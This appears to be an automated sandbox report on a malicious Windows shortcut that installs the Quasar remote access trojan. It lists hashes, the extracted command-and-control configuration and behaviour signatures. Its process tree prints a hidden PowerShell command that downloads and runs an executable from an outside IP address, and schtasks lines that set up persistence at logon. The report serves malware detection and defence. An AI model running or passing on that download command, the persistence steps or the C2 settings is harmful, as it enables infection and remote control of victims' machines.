Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Resource
win7-20240903-en
General
-
Target
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
-
Size
2KB
-
MD5
4a98c5bbf1a94992ec72858d3327a28e
-
SHA1
0fa914c44bdcb63d3631d5ec30cebb5047d12c7a
-
SHA256
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543
-
SHA512
e60fb58d1f141d3c2ea99bf39d3b0dd872bebc05efa0cfa630e783f4d90b624084988c66621adc4d7dc6434b1c707d1d6c7c1f36ee2fa2e36fefc47b9a7d6ba7
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar
1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
-
encryption_key
7Vp2dMCHrMjJthQ2Elyy
-
install_name
downloads.exe
-
log_directory
Logs
-
reconnect_delay
5000
-
startup_key
cssrse.exe
-
subdirectory
downloadupdates
Signatures
-
Quasar family
-
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1148-62-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/1148-61-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/1148-58-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 2820 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
ujtjewc.exeujtjewc.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedownloads.exedownloads.exepid Process 3016 ujtjewc.exe 1148 ujtjewc.exe 2280 ujtjewc.exe 992 ujtjewc.exe 1696 downloads.exe 1324 downloads.exe 2968 downloads.exe 2384 downloads.exe -
Loads dropped DLL 4 IoCs
Processes:
ujtjewc.exeujtjewc.exepid Process 3016 ujtjewc.exe 3016 ujtjewc.exe 3016 ujtjewc.exe 2280 ujtjewc.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
ujtjewc.exedownloads.exedescription pid Process procid_target PID 3016 set thread context of 1148 3016 ujtjewc.exe 33 PID 3016 set thread context of 2280 3016 ujtjewc.exe 34 PID 3016 set thread context of 992 3016 ujtjewc.exe 35 PID 1696 set thread context of 1324 1696 downloads.exe 40 PID 1696 set thread context of 2968 1696 downloads.exe 41 PID 1696 set thread context of 2384 1696 downloads.exe 42 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ujtjewc.exedownloads.exeschtasks.exeujtjewc.exeujtjewc.exeujtjewc.exeschtasks.exedownloads.exedownloads.exedownloads.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 2004 schtasks.exe 1096 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedescription pid Process Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 3016 ujtjewc.exe Token: SeDebugPrivilege 2280 ujtjewc.exe Token: SeDebugPrivilege 1696 downloads.exe Token: SeDebugPrivilege 2968 downloads.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeujtjewc.exeujtjewc.exedownloads.exedescription pid Process procid_target PID 2372 wrote to memory of 2820 2372 cmd.exe 31 PID 2372 wrote to memory of 2820 2372 cmd.exe 31 PID 2372 wrote to memory of 2820 2372 cmd.exe 31 PID 2820 wrote to memory of 3016 2820 powershell.exe 32 PID 2820 wrote to memory of 3016 2820 powershell.exe 32 PID 2820 wrote to memory of 3016 2820 powershell.exe 32 PID 2820 wrote to memory of 3016 2820 powershell.exe 32 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 1148 3016 ujtjewc.exe 33 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 2280 3016 ujtjewc.exe 34 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 3016 wrote to memory of 992 3016 ujtjewc.exe 35 PID 2280 wrote to memory of 2004 2280 ujtjewc.exe 37 PID 2280 wrote to memory of 2004 2280 ujtjewc.exe 37 PID 2280 wrote to memory of 2004 2280 ujtjewc.exe 37 PID 2280 wrote to memory of 2004 2280 ujtjewc.exe 37 PID 2280 wrote to memory of 1696 2280 ujtjewc.exe 39 PID 2280 wrote to memory of 1696 2280 ujtjewc.exe 39 PID 2280 wrote to memory of 1696 2280 ujtjewc.exe 39 PID 2280 wrote to memory of 1696 2280 ujtjewc.exe 39 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 1324 1696 downloads.exe 40 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2968 1696 downloads.exe 41 PID 1696 wrote to memory of 2384 1696 downloads.exe 42 PID 1696 wrote to memory of 2384 1696 downloads.exe 42 PID 1696 wrote to memory of 2384 1696 downloads.exe 42 PID 1696 wrote to memory of 2384 1696 downloads.exe 42
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ujtjewc.exe');./'ujtjewc.exe';(get-item 'ujtjewc.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1148
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2004
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe" /rl HIGHEST /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1096
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:992
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
774KB
MD5b8fc2efcc33d3160f38fcb6b39319e6a
SHA1a61413a5b6c19b4a388e6c89aaa9304c657b3e08
SHA2563df20b1c9806c327d72824f1b9a4ffcbe702d152fbf11fca42a36c862cbafd0a
SHA512ba4ef7ec5dd7b9ad8ec49ef73315bded8ecc72212b11e3a1384b6d4f3f264867312cda41268a8d1df6fc8c3caa63813c15aa4ff29f0324360a95d59de3456d3b